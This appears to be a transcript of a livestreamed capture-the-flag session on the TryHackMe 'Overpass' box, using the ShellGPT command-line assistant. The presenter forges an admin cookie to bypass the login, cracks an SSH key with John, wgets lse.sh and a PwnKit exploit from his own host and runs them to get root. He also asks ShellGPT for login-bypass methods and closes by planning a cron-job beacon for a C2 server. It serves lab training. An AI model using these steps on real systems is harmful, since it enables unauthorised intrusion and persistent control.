Hey everybody, good morning. I am back from Black Hat and I'm ready to get going this morning. So, hope you are too. We're going to start off a little bit this morning different. Not different, but I've been investigating Shell GPT and looking at some of the features to see what we're not using yet, as is the case with most of the time when you use a tool. You end up using it for one particular purpose, and then you have to go back and kind of look at the actual features that it has, because a lot of times it's added a lot of features and you just don't even know what you're missing out on, right? So here we go. Looked at the usage here, and we've been doing the shell commands, which is our SGPT-S that we've been doing. And so there's a couple examples of that. We've been doing that. It's the shell integration that I wanted. So I look down here and you see here it says there's this handy feature which allows you to use SGPT shell completions directly in your terminal. And so, make sure okay, we're good over here. And so it took me a hot second to figure out how this works or how it's supposed to operate. Hey, good morning, buddy. Good to see you. Yeah. There's a. I figured this out. So while I was out in Black Hat, I worked on it on my Mac. Now, see, here's what we're going to find out. If you look here, it says that for shell integration, you should just be able to run SGPT shell integration like that. But if we go to our Kali box, we're going to find out that that doesn't work. So SGPT shell integration, and watch, it won't work. See there, it says only available for a ZSH or bash shell. If we echo the shell, we see that it is ZSH. So something's wrong with the way that Shell GPT tries to identify the shell that you're using. So let me show you here. And by the way, this is just a good skill, right? If you want to get to the point where you're, an elite hacker, or just a competent tech person, you've got to learn how to start using repos and how to actually kind of dive into them. So if you go into SGPT here, and we'll see if I remember exactly where it is. See, here's this integration.py. And there's a utils.py. So if you go all the way to app.py, so app.py is the real thing. And then we're going to search for integration. Is it not? Oh, I searched the wrong thing. Excuse me. Here we go. Integration. Okay, there we go. So here is from SGP utils. We're gonna import install shell integration. That sounds like something we want. Shell integration. Yep. There we go. Okay, so it says that we're importing it from the utils. Which, let me make this just a little bigger. So since we're importing it from utils, let's go to utils. So they've got this handy thing over here on the side, File Explorer. Click on utils. Let's search again for integration. Integration. There we go. So from sgpt.integration, import bash and import zshell integration. Oh, so it looks like, as we keep looking here it is. And by the way, here is where it's trying to determine if you have a ZHS shell or not. So you see here it says install shell integration, currently only supports ZSH and bash. Well, we have ZSH. So it says it's going to do shell and it's going to get environment shell. And we just did that on the Kali box and it came back, with ZSH. And if we go over here, it says that all it's going to do is check the path, the expander. Oh, that's where it's going to write it. It says if ZSH in shell. So I don't know why it's not working on the Kali that tells me that when SGPT runs, for some reason the environmental variables either are not accessible to it or it's not seeing it right. But the point is it doesn't think we have it. So that means we need to go to utils, I think. Is that where we want? No, we're in utils. We need to go to this integration file. Here we go. And here it is. This is it. This is all it does. It just is, here is the shell GPT integration. So here's SGPT bash. And then down here, here is SGPT shell or Z shell. Okay. So all it's doing is it's just adding these lines from here to here. It's just adding these lines to the ZSH shell. That's it. That's all it does. So we can do that. We can just bypass the whole thing. So we're going to right click and we're going to copy. Notice it says here, shell GPT integration Z shell. They were really nice guys. And they kind of opened and closed this section with a comment, so it's easy to tell. If we read this to see what it does, it's a little arcane, but we can read it. And it says if the buffer, and I think if the buffer is not empty, I think is what that's saying, then SGPT previous command equals buffer. And then the buffer equals this little like, hey, where I'm thinking emoji. And then I don't know exactly what these are. But it does say, it's saying to do something and then to redisplay. So it's definitely going to redisplay. And then the buffer is going to equal, the new buffer is going to equal SGPT shell plus the previous command, no interaction, and then it's going to put it back out. Now that may not make a lot of sense right now, but it will in a moment. And then the key bind, it's going to bind a key to this command, and that key is Control L. That's what that little caret is there, Control L. And when you hit Control L, it's going to run the underscore SGPT ZSH, which is what the name of this thing is right here. So actually you're getting two commands or three commands that we're putting into our, this is one function we're putting in our ZSH shell. And then these are two commands that I assume have to do with the, oh, okay, so it looks like we're enabling the function. Here is the function, and then we're adding the function. And then we're going to bind the Control L key to the function. So that's all this is, okay? And again, this is a skill that takes time. It takes time to learn how to be able to go into a repo and try to, you know, not reverse engineer it, but just be able to look at it and figure out what they were doing. So now let's go back to, actually we're going to go to our notes because this isn't going to copy over well. So let's go over here to notes, and I'm gonna, oh, am I not connected? All right, let me reconnect here. Connect to host. Here we go. I had rebooted my Kali machine, so I don't think it had connected. Repos, notes. Oh, I think I have a, I thought I had a, let me close this. I think I have a workspace file in here, in the notes file. So let's go to repos. And there it is. Yeah, I have a workspace file. I need to make my thing bigger again. All right. So let me make this bigger again. And, oh, I'm going to slide this over here. And we're going to close agent sudo because that was terrible. And in our notes here, I'm just going to make a new file, SGPT integration .text. We're going to paste it in here. Okay. So that's in there. Now we're going to go back to our Kali box. And we're going to go to, we need to open, we need to open our cursor. I'll do that in here. Change directory, We need to do that one of these days too, is like actually get cursor working nicely and not just like running out of the downloads directory. It's kind of ratchet, but it's okay, it works. Let's go here, there we go. So there's our notes. We don't want agent sudo again. We're gonna put that down. We want this SGPT integration. All right, let's copy this. Copy. Now let's open a third tab. We're gonna vim here. Vim ZSHRC. Okay. So let's, I guess we can just add it right here at the end. Let me do this. Let's make a comment so that we remember what this is. SGPT shell integration. Okay. And let's paste it in. Okay, so there it is. So we have pasted it in now. I think it's fine right here. I don't think we need to put anything else in. Let's save it. Oops, what did I do? There we go. Right, quit. Okay, now we got to source it, because that's how you get it to become active in your shell, because right now it hasn't reloaded the shell, so it doesn't know anything about it. Okay, so let's just do a regular SGPT command, and we're just going to say in here, good morning. What, I don't know. What is the coolest Linux distro? I love asking it questions like this because it probably will just be like, it depends on what you're doing. It's subjective and can vary on what you're looking for in a Linux distribution. At least it gives us a bunch of fun distributions there. Okay, so there's that, okay? So now, remember, we've been doing a lot of our like nmap, and let's even go ahead and look here. Let's go back to our other page. I've got Overpass running. Let's go ahead and add an hour before I forget. Let's pull this down just a little more. Get the IP address down here where it can peek through to me. So there's the IP address. All right, so normally we would do this. We would say SGPT S, and we'd say nmap top 1000. Oh man, I can't type this morning. Top 1000 ports, 10.10.97.250, right? So this is the normal way that we've been doing SGPT, and then we get this execute describe abort. And then I complain about how I have to like hit abort and copy it, and it doesn't go in the history, and yada, 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 all that stuff that I do. So we're going to hit abort. Now watch this. Now I'm going to put nmap top 1000. Yeah, top 1000 ports 10.10.97.250. Okay, now what I'm going to do now is I'm going to hit Control L and wait. And look, I don't know if you saw that or not. You had to watch very closely, okay? When I hit Control L, it took everything I had on the command line and sent it to Shell GPT as this -s. And then I just got the command back straight into the buffer without any of that, like explain, abort, any of that, okay? So now let's say, oh, I see this top 1000 ports, but actually I forgot that I need to do output, and I need to do all outputs to repo, or I'm already in repos notes, Overpass to repos notes Overpass. Oh man, we're really gonna mess it up too. And create that directory if it doesn't exist. Let's see if it can do that. That's pretty crazy. Oh, I'm gonna say does not, because that quote would probably mess it up. Okay, Control L and watch. Look at that. Make directory P, because the P flag for make directory says make it and don't give me an error if it already exists. And then in map, and then output to repos, notes, overpass, text. Close. Close. I need all outputs. Ah, dang it, I hit the wrong, but see, then I forgot to hit the wrong thing. Control L. And did it do it this time? I told it to do all outputs. No, it still doesn't understand what I mean. So I'm going to go back here and do this. I'm just going to help it. OA. Yeah, now I'll hit Control L. And see if that does it. There we go. Oh, it's still thinking because I haven't got my oh, that is it. Hit enter. And let's see if this works. Oh, do I not get any output though when I do it that way? Oh, I just got an output.txt. What happened to the one I did? Huh. I guess it didn't understand what I was asking for. Cat output.txt. Well, it worked. It got me the most basic thing. But the point is this. The point isn't the in-map scan. The point is that now we've done a buffer. And we've been able to, now we can just use SGP in the shell. And especially if a command has an error, all we have to do is like probably just say fix this on the end of the command and then hit that Control L and it'll just come back with a fixed version of it, which is pretty sweet. Pretty sweet. All right, so there's one thing fixed this morning. Now let's go back. I want to do one more thing because one of the other things that's in here that we've talked about before is that SGPT doesn't normally keep a conversation, but it can keep a conversation. It can keep context. So if we go down here, it explains, oh, and it does code generation too. We haven't needed that yet, but here's chat mode, okay? So you can have SGPT chat conversation 1, and it'll keep a history of the chat conversation. So what we need to do, and then you can do chat conversation 2. I really don't like the way it does this though, because I really wish it let me just use a real number instead of, oh, you know what? I bet this is silly. It doesn't have to be conversation 1 or 2. I just realized what they're doing. It's not conversation 1 and conversation 2 that increments. That's not what it's saying. You get to name the conversation whatever you want. I guess I'm dumb and I just didn't realize that in the beginning. So that's cool. So you know what that means? That means that now we can do this. We can do SGPT chat like that. Well, double chat. By the way, let's just do the help real fast. Is it just, can I just do the C? Can I just do C for chat? No, C's code. Dang it, chat doesn't have a shorter message. I don't know why. Follow conversation with ID. Use temp for quick sessions. Default none. We got then we eventually got to figure out how to use a REPL, because there's supposed to be a REPL in here, and I don't know how that works yet. And then also the roles. We haven't got to that yet. We can do a system role, and we can create a role for it. Now I don't know if we have a create role, show role, and list roles. So we'll have to look at a little more documentation on how the roles go, and we won't worry about that this morning or we'll blow our entire hour here on that. I just wanted to get into the chat because what I want to start doing is I want the chat to be able to, I want us to be able to start having a running chat with it about a box. So now that means we should be able to do this. Chat, and we'll just call it OP for Overpass. I guess we'll just call it Overpass. That's not too much to type. Chat, Overpass. We are working on a CTF box on try hack me named Overpass. There we go. I will just go ahead and say port 80 and 22 are open. And now we should be able to start, doing this. All right, sweet. So let's go back over here. Now let's do this right, and let's do our lazy recon on the box. So I should just be able to put lazy 10.10.97.250 overpass, and we're in the right directory. Go. All right, so how is that so far this morning? Does that make sense? Is that cool that we've got that going with the with SGPT? What do you think of that? All right, let's get this going. Sweet, we got our Durbuster going. I love that our little lazy recon there, and how we do. Look, we already got an image, a download, and about us, an admin. We already got all kinds of stuff here. We're doing great. That is perfect. Okay, so now, if we look here, we can do this. Let's do it. Oh, where's our GoBuster going? Where's the output for the GoBuster? It should be right here. Does it not say on here where the output's going? Because I thought GoBuster gave us output as it was coming out. Let's look. This is that's our in-map. That's the other in-map. Let's go look at the actual script and see where it is putting it. Scripts, tools, scripts, lazy recon shell. Oh, what were you having trouble with on SGPT? Because I have noticed a common problem that it has, and I know how to fix it. It doesn't. Yeah. Yeah, we'll figure that out. Yep. I would actually suggest Olama. Olama is a lot easier than I mean LLM Studio. I guess I can't say that. I haven't used LLM Studio in a long time, and I'm sure they've got more things going. So let's see where am I saving that GoBuster at? Okay, GoBuster. Where am I saving this output file? And oh, is the GoBuster? I don't have it saving an output file. Okay, so that's the next thing we've got to do this morning is we've got to update this because this is important. I want this to have an output file. So let's see if we can just do the. Let's see if we can do a Control L in here. Ew, putty. I hate putty. Haven't had to use putty in forever. Oh no, we don't want chat. That's not what I wanted. Must be Control K. There we go. Need to add file output to GoBuster commands. And I think, do we have a... Yeah, I know. Putty just, ugh. That's why VS Code became so wonderful. You never needed Putty again once you got VS Code. And even before that, I was using MOBA Xterm was the little utility I was using before I figured out I could use VS Code to do all that. Need to add file output to GoBuster commands, and save file use hostname underscore GoBuster dot text, I guess. Submit edit. Let's see if that works. I just wanted to add that on the end so that we can... There we go. Host. Oh, nice. It even does that, which is good. Okay, yeah, we'll accept that. And then, by the way, this is, we're going to learn something here. And in fact, I think Overpass has this problem. So we just updated a shell script that is already in the path here. And so when we run it again, the update just runs. And I guess what I'm saying is we're going to end up finding a cron job inside of Overpass. And the cron job is run by root. But we as a... and in this case, it curls to a different machine to get the script. And so we're going to be able to use the host file to point to a different server where it's going to look for that shell and it's going to look for that script, and it's going to pull our version of the script. So anyway, if that didn't make sense, we'll get there, and it'll be cool. So now let's run this again. And now this time, this starts. There we go. Oh, I love it. Remember, we told it not to run nmap again if it had already run nmap, and it works. So we don't have to sit here and wait. Whoops. So now let's go into LL. And now we have a GoBuster text. And the thing I love about GoBuster is still running, but as it finds things, it's going to go ahead and, whoops, cat overpass HTTP. It's going to go ahead and add them as it's going. So what's going to be great now is now we can say SGPT. Yeah, here's our chat overpass. Okay. So SGPT chat overpass. Actually, we need to cat the overpass. Yep. And we're going to cat it into SGPT chat overpass. And we're going to say GoBuster has discovered these DIRs. See, now for the first time since we've been doing this, we actually hear in the terminal have a chat going with SGPT, and now we can start actually talking to it about what we're doing, which is great. Oh, you got a month of Chatgpt? I mean, I think one of the cool things you can do with it is you can create, remember, you can create images with OpenAI, which is nice. So you can create images for free. you'll be able to, it really does code well. So if you've got some coding things you want to do, it does a pretty darn good job at coding. So you can use it to code or to help you code. And it'll let you do about 30 messages in like a 2 or 3 hour period. So you can get pretty deep into a little coding project before it'll run out and then make you wait a few hours before you can come back to it and keep going. But that's another one. Let's cat the nmap in here too. Overpass dot nmap. Here is the nmap with nmap output with IP and other stuff. Yeah, exactly. Use it to code because it's really good at that. So have it help you code some stuff. Oh man, this is great. I'm loving this. I'm really glad we took the time to do this morning because now I don't know if you're really grasping what we're doing here, but now we actually have a running chat, and the context of the chat now is beginning to remember everything that we've done. So let's do that. Watch this. This is going to be awesome, I think. SGBT chat, overpass. Please create a notes. Please create notes on the box so far. Make it in Markdown format and only respond with the notes.markdown file. And we're going to output it into overpass notes.markdown. And let's see how well it does. Because we're not going to see it. It's just going to spit all of it out into a file. And when it's done, we're going to go to cursor over here and see what it looks like. Man, it's making some pretty big notes if it's taken this long for it to come out. All right, let's go. Wow, is it still going? There it goes. Okay, so now let's go to cursor and open Overpass. And where's the Overpass notes? Not bad. Let's make this a little bigger and get our. It may be better than we think once we get. Okay, so now let's do it. Let's look at our. Look at that! Overpass CTF box notes general. IP, date of scan, the nmap command used. Look at that. 2280 web directories found, potential attack vectors, next steps, and notes. Look at that. That is so awesome. It's making our notes for us too. So, okay, that's cool. So let's keep going now. So now we're going to go ahead and we're going to look at the actual site itself. So we already see what we've got here. Let's open up Firefox. Now I feel like I really do have like a little CTF assistant helping me to work on this. Okay, so let's go to 10.10.97.250. Okay, here's Overpass. And we know, yeah, they took our jobs. Yeah, exactly. And we know that it has a downloads. Okay. Precompiled binaries of Overpass, but we don't need, I know we don't need those. And then we've got the About Us. We obviously want this admin. Let's just go to admin because we know that's what we want. Admin. Username, admin, admin. Okay, that doesn't work. Don't save. Let's open up our inspect. Okay, so we're inspecting. We're inspectors. We're going to go to, here's the network stuff. Admin, password, login. And when we see that, it just posted the login to login.js, which I guess is right here in admin. So if we do this, copy, open a new tab, paste it in, just so I don't have to like close my other tab. What did I say? Login.js, page not found. It must be at the root. Login.js. There it is. All right, I don't want to read this, so we're going to copy it. Okay, and we're going to go to our notes. We don't want tools anymore. We want Overpass. Oh, I'm not in the right one. I need to do it inside here. Okay, so Overpass, new file, login.js, paste it. Okay, now let's go back to SGPT. All right, so now we're going to cat login.js, and we're going to pipe SGPT, whoops, -- chat, Overpass. I found this login.js script. How can we bypass it? We're just going to see if that works. All right. To bypass this login, you can consider the following approaches. All right. Client-side validation bypass. Check if the validation is only client-side. If so, you might be able to modify JavaScript in your browser. Skip the login. I know that's not true. It's coming from the server. I just know that. Don't worry about it. Default credentials. Nope. Credential stuffing. Nope. Injection attack. Nope. It's not a SQL box. Session management flaws. Check if the application is vulnerable to session fixation, or if you can predict or reuse session tokens. Okay. That one we might be able to do. API, network militia, the brute force attack, blah, blah, blah. Okay. I'm trying to do this without pulling out burp. I will pull out burp at some time soon, but I have not used burp in forever, and I'm afraid I will look like an idiot if I pull burp out. So let's go over here. We know that. Where would cookies be? Are they under storage? Cookies. Are there really no cookies? Cookies. All right. I thought there was a way we could do this with the cookies, and we could just get around it pretty quick. But I don't remember exactly how that works. I guess. Okay. Let's go back to SGPT. SGPT chat Overpass. Can we create a session token in the web.js console? Document cookie session token value. Okay. Let's try that. Kind of like this. Copy. And let's Let's go back here. Let's go to console. Paste. Oh, why didn't I let me paste that? Can you not paste like that? All right, well, that's fine. We'll... What? What's happening? There we go. Oh, I can do it from here. Okay. Actually, I can just scroll this down. Sorry. Going a little slow this morning. I apologize. Document.cookie. Whoops. Cookie. Okay. Document.cookie equals... quote session token equals I am admin. Whoa. Did it work though? Storage cookies. Ah, it worked. Okay. So all it did was look for, all it was doing was looking for a session token. If we go back over here, you can see here that there's the stuff, const creds, username.value, password.value, const response, if status or cookie equals incorrect credentials, then it gives incorrect credentials, else cookie set session token to admin. So it's actually really flawed code. The code is terrible because the code is saying that if the server comes back with incorrect, then you tell it that it's incorrect. But anything else, anything other than incorrect credentials, give the person admin. That's it. That's really bad. Yeah, we will do some burp. We will do some burp. I've just got to go back and refresh my memory on it. If you're using burp with this, what you do is it's a very classic, you just intercept this incorrect credential coming back, and instead you can literally just change it to anything, and then you get admin. Very similar to what we did, but you can see here it has status or cookie. So we just went the cookie route. If you use burp, you can go the status route. So it gives you the choice either way. So now we have a private key. So let's copy this private key, although it is encrypted. So we're going to have to do some SSH to John. Let's pull this back up. Overpass, new file, ID RSA, encrypted. Paste that in. There we go. Okay, so there's that. So now we have the private key, but I know that this is encrypted. So we're going to have to... I think I saw that this is in user share John. Okay, good. I don't want change directory. We want... Oh gosh, look at all these. Okay, so this is where all the John crap is hiding. It's in here. So there should be an SSH to John in here. I guess we will change directory into here because there's just too much crap in here. Unless this is in the path. SSH to John. Oh, good. Okay, so it is in the... It's in there. Okay, and then you give it the private. Okay, so ID RSA encrypted. Whoa. So I guess we need to do that into a file. Again, been a while since I've done this too. SSH John. Okay, and so then we need SSH. Oh, we need John. ID RSA encrypted like that. Let's see if that works. No hash, no password hash is loaded. What? Oh, we don't want that. We want the John one. What did I name it? I'm so dumb. SSH John. Look, literally just did it right there. Look, that's how quick. That's how lazy I am. That's how quick I forgot that. Okay, so now it's going to do that. Oh, wow. That was really fast. James 13. Okay, so we see that the password has James in it. So does that mean that that's the SSH for James? Is it that easy? SSH James. It's funny, James was the name on the other one too, I think. 250-I think. ID RSA encrypted. Yes. James 13. James 13. Oh, is that not it? What? Oh, I gotta chmod this. I gotta chmod this guy. Chmod 400, ID RSA encrypted. Okay. I had to read. See how it says unprotected private key? So if this is a gotcha, especially if you're early and you're not used to SSH, okay? If the key, the ID RSH, the SSH key that we're using, this guy right here, if you don't change the permissions on him to 400, and 400 is read only, we're just gonna do a regular SGPT on this. Why do you have to chmod a SSH private key to 400 to use it? Because you do. You have to change it to read only. And if you don't, then what happens is it won't use the key and it tries to go straight to password authentication, and SSH is configured on the other machine so that password authentication doesn't work. It's not a thing. Like it just won't let you in even if you have the right password. So now that we've chmodded it, hopefully I won't look like an idiot here and I went into that speech and it like doesn't work. All right, now I'm in. Okay, we're in. And we got a nice full shell. And we're going to cat user.txt. Okay, and we're going to save this in our notes. Copy. Actually, if we open a new tab, we're going to do SGPT chat overpass. I was able to find the encrypted SSH key and crack it, and now have user and now have logged in as James. Here is the user flag. I just want to hear it congratulate me. It's going to be like, oh, good for you. You're so good. Great work on cracking it. Like, thank you. Thank you. Oh, well, I want you to update the notes, not me. SGPT chat overpass. Update the notes file. Respond only with the notes. Overpass notes.markdown file. Out over pass notes.markdown. Okay. So now we're going to let it rewrite the notes again. Now the problem with that is those notes looked really good, and I'm completely overwriting the old notes. And so you guys know how GPT is. It'll do things like it'll come back and say everything else is the same. See like how it did this right here? It's like only these things changed. Let's see if it was lazy and did that. And you have to like prompt it if you don't want it to do that. It probably did that to us. It probably just overwrote all of our really nice notes we had and did like, oh, it was all the same except for this. Oh, it didn't. It actually looks like it did it just fine. Oh, I should have left. Let's get rid of this. Let's get rid of this. Let's get rid of this. Let's move this over here. Let's do this. There we go. General information, web directories, achievements, user access gained. Ooh, wow. All right. Oh, it even gives us things we should try inside here. Paste. Oh, that's not the right one. That's not the right shell. We're over here. Give me just a second. That time of the morning where I have to check my phone for just a split second. I know you forgive me for it. How's it going this morning? Everything else all right? I got about 10 minutes left here. We'll see if we can. If we can't finish the box, it's fine. We literally have the SSH for it now. So James 13. Oh, we don't actually have the real password for James, so that won't work. All right, so we need to go over here. We didn't forget. I just haven't started the HTTP server because I rebooted since I was gone. Let's see here. I know, right? I've got a little Keurig in here, but I usually use it for tea in the afternoon, and it's out of, you can't see it, but there is a Keurig in here. Let's see, LL scripts. Did I put it in scripts? It seems dumb. Oh, it's in notes. And then in notes, I've got tools. Yeah, and then there's an HTML in here. HTML. We're going to need this guy. Okay, so SGPT S Python HTTP server on port 80 here. Yep. Oh, I should have I'm going to do it just to get my muscle memory going here. We're going to abort. And we're going to do that. And then we're going to do the Control L. Beautiful. See that? So nice. That Control L is perfect. Okay, so now we're back over here. Now we're going to... we need to do our little... grab our little which command. Which is in this notes file. Yeah. We need this guy. Copy. We're gonna do that. Oh, wrong one. I keep doing that. This one. Okay. So this is Ubuntu 18. Very likely susceptible to our like easy way of busting it, but we don't want to do that. We want to try to do the right way. We might do the easy way first, just before I leave today, but then when I come back tomorrow, or actually it'll be Wednesday. Wednesday is when I'll be back this week. And when I come back Wednesday morning, we'll go ahead and do the other one. So this machine has Python curl, netcat wget, way too much crap again on it. I mean, just like, look at all that crap that's on here that shouldn't be on here. Okay, so since we have all that, let's wget, dang it, I forgot my machine again. IPA 10.6.87.88. Okay. HTTP 10.6.87.88 /lse.sh and chmod plus x lse.sh and run lse.sh. That should work. Yeah, we don't know that. Okay, we're running. We'll let it run for a second and we'll see what we get out of it. Whew. So SSH files and home directories, yep. Useful binaries, yep. We already looked for those. Binaries with the SUID bit, yes. But it didn't show me like uncommon ones yet. Files with capabilities, haven't got to that yet. Cron jobs, this is a cron job box. Can we write any paths in the present cron jobs? Yes. Can we write a GPG agent socket? Interesting. Waiting for the process monitor to finish. We're going to see if it's vulnerable to one of our classics. Like I said, it probably is. And we'll do that. Yep. Yep. This one is Polkit and PwnKit. All right, so if we... And this box has such a good... Oh, it's not really... I guess I don't have that much on here. Okay, so wget http 10.6.87.88 /pwnkit and chmod plus x pwnkit and /pwnkit root. There we are. Change directory root and cat root.txt. Okay, so we grabbed the root.txt for today because I need to finish this. But then tomorrow we'll actually do it the correct way with the cron jobs. Is it cron tab L? No cron tab for root. What? Exit cron tab L? No cron tab for James. I know there are cron jobs on this machine. We'll find them. All right, let me copy this one more time. Copy. We go to our over here. Oh, I don't want that one. I want this one. All right, I was able to, okay. I used PwnKit and got root. Here is the root flag. Please update our notes for this box. Make sure to write out all the notes completely. Only respond with Overpass, or how did I, oh, it's Overpass. It doesn't really matter because I'm making the file name. Overpass notes.markdown. Wrong way. We're going to do one. Overpass notes.markdown. Okay, let's let it make those notes. And I hope you learned something today. Man, that's nice. We're starting to get a nice little flow of how to use SGPT with this stuff. So I had an idea, and you guys tell me about this idea. Those of you, anybody that's hung on here and is still around, I thought about the fact that we should write a automated script that lets us not just escalate to root like this. There's so many of these boxes that have PwnKit that we should figure out how to use PwnKit to make a little C2. I want to make a little C2 server is what I'm saying. So, for instance, I think this PwnKit might actually even have a help tab. Okay, no, it doesn't. But I think if we go to it, there may be a way to put a command in it, to run a command. To like say, hey, and then command, you know, ls or something. But I think there's a way to do it. Or we can at least update it. Definitely with PwnKit, because that's a Python script, there's a way to have it run a command. So in other words, what I'm saying is when we run the exploit to go to root, we don't just go to root. We actually write a cron job to the machine that sets up a beacon so that we beacon back to our machine every 2 seconds. And then that way we can set up a simple C2 server on the machine, and we can start building out a little C2 server. I thought that would be fun. And then we'll have Chatgpt or, you know, one of the LLMs help us write a C2 server, a simple one that we use, so that when we pwn these boxes, we're not just pwning them for the flag. We're also seeing if we can auto pwn them straight into a C2 server kind of setup where we have control over them. Obviously, it doesn't work that great because the box only lives for like an hour. But if we get really ambitious, we could. I have a really large environment. Here, I have a big vSphere environment, and I could actually set up several boxes, and we could have several different boxes all going back into a C2 server, and we could use kind of a lab environment here at my house and be able to work on kind of building a little C2 that would be kind of fun to keep trying to do some auto pwn stuff. Anyway, that's it. Yeah, that'd be awesome. So, all right, I got to get going this morning. Wanted to get a full hour in. We did get through this box, although we cheated, but hey, you know, we're hackers. That's what we do. Tomorrow or Wednesday. I'll be back Wednesday, I think is the plan. And when I come back on Wednesday, we'll do the cron job to root this guy instead of using the cheat. And then we'll probably move on to another box. So anyway, great having everybody this morning. Hope you all have a wonderful rest of your day. See y'all later.